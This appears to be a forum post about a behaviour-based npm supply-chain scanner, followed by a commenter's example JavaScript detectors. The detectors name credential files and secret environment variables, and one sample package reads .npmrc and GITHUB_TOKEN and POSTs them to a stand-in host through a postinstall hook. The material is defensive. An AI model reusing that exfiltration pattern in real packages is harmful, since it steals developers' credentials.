Shai Hulud, the chalk and debug hijack, and S1ngularity all spread before any advisory existed. Tools that rely on vulnerability databases like npm audit, Dependabot, or Snyk passed them clean because there was nothing in the database yet.
That annoyed me enough that I built a different approach.
Instead of checking advisories, the scanner reads the package source and looks for behaviors common in supply chain attacks. Things like install script abuse, credential theft, unexpected filesystem access, network exfiltration, and obfuscated payloads.
Right now it uses 46 deterministic detectors. No LLMs, same result every time.
Full methodology and dataset notes are here: westbayberry.com/benchmark
Curious what attack patterns people here have dealt with before and how they handled them.
ComCat•1h ago
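Added example, not the post author's scanner: a handful of deterministic, behaviour-based detectors of the kind the post describes (install script abuse, credential file access, secret-plus-network exfiltration, decode-then-eval obfuscation), run over two constructed in-memory npm packages. Detector names, regular expressions, severities and both sample packages are assumptions made for this illustration.

```javascript
// Added illustration of behaviour-based npm package scanning.
// Not the westbayberry scanner; every pattern and name below is an assumption.
// A package is modelled as its parsed package.json plus a map of path -> source text.

// Detector 1: lifecycle hooks that shell out or pull remote code at install time.
function findScriptAbuse(pkg) {
  const scripts = pkg.manifest.scripts || {};
  const hooks = ['preinstall', 'install', 'postinstall', 'prepare'];
  const shellish = /\b(curl|wget|bash|sh\s+-c|node\s+-e|powershell)\b|\|\s*(sh|bash)\b/;
  return hooks
    .filter((h) => typeof scripts[h] === 'string' && shellish.test(scripts[h]))
    .map((h) => ({
      detector: 'install-script-abuse', severity: 'high',
      file: 'package.json', detail: `${h}: ${scripts[h]}`,
    }));
}

// Source-level patterns (assumed). Kept as plain regexes so results are reproducible.
const CREDENTIAL_PATHS = /\.npmrc\b|\.aws\/credentials|\.ssh\/id_|\.git-credentials|\.config\/gh\/hosts\.yml|\.docker\/config\.json/;
const SECRET_ENV = /process\.env\.(NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY|NODE_AUTH_TOKEN)\b/;
const NETWORK_CALL = /\b(https?\.request|https?\.get|fetch|axios\.(post|get)|net\.connect|dns\.resolve)\s*\(/;
const DECODE_THEN_EVAL = /\b(eval|Function|vm\.runInThisContext|vm\.runInNewContext)\s*\(\s*(Buffer\.from\([^)]*['"]base64['"]\s*\)\.toString\(|atob\()/;
const HEX_ESCAPE_RUN = /(\\x[0-9a-fA-F]{2}){16,}/;

// Detectors 2-4: run over one source file, return zero or more findings.
function scanSource(file, src) {
  const findings = [];
  const push = (detector, severity, detail) => findings.push({ detector, severity, file, detail });
  if (CREDENTIAL_PATHS.test(src)) {
    push('credential-file-access', 'high', src.match(CREDENTIAL_PATHS)[0]);
  }
  // Reading a token-like env var is common in legitimate publish/CI tooling; it is
  // the combination with an outbound network call in the same file that is flagged.
  if (SECRET_ENV.test(src) && NETWORK_CALL.test(src)) {
    push('env-secret-exfiltration', 'high',
      `${src.match(SECRET_ENV)[0]} with ${src.match(NETWORK_CALL)[0]}`);
  }
  if (DECODE_THEN_EVAL.test(src)) push('obfuscated-payload', 'high', 'decoded string passed to eval/Function');
  if (HEX_ESCAPE_RUN.test(src)) push('obfuscated-payload', 'medium', 'long run of hex escapes');
  return findings;
}

// Whole-package scan: manifest detectors first, then every source file.
function scanPackage(pkg) {
  const findings = findScriptAbuse(pkg);
  for (const [file, src] of Object.entries(pkg.files)) findings.push(...scanSource(file, src));
  return findings;
}

// Constructed sample: a benign package that reads NPM_TOKEN but never sends it anywhere.
const BENIGN = {
  manifest: { name: 'pad-ish', version: '1.0.0', scripts: { test: 'node test.js' } },
  files: {
    'index.js': 'module.exports = (s, n) => s.padStart(n);\n',
    'publish.js': "const token = process.env.NPM_TOKEN; console.log(token ? 'set' : 'missing');\n",
  },
};

// Constructed sample: a package exhibiting all four behaviours (no real payload;
// the base64 string decodes to console.log(1)).
const SUSPICIOUS = {
  manifest: { name: 'totally-fine-utils', version: '4.2.0',
    scripts: { postinstall: 'node -e "require(\'./setup.js\')"' } },
  files: {
    'setup.js': [
      "const https = require('https');",
      "const os = require('os');",
      "const fs = require('fs');",
      "const npmrc = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');",
      "const body = JSON.stringify({ npmrc, token: process.env.GITHUB_TOKEN });",
      "https.request({ host: 'collector.example', method: 'POST' }).end(body);",
      "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());",
    ].join('\n'),
  },
};

console.log(JSON.stringify({ benign: scanPackage(BENIGN), suspicious: scanPackage(SUSPICIOUS) }, null, 2));
```

Running it yields no findings for the benign package and four for the suspicious one, one per detector. Two design points carry over to any real implementation: pairing a sensitive read with a network sink in the same unit keeps the secret-access detector from firing on ordinary publish tooling, and regexes over raw text are only a starting point, since a production detector would work on the parsed AST so that string splitting or `String.fromCharCode` tricks cannot slip past the pattern.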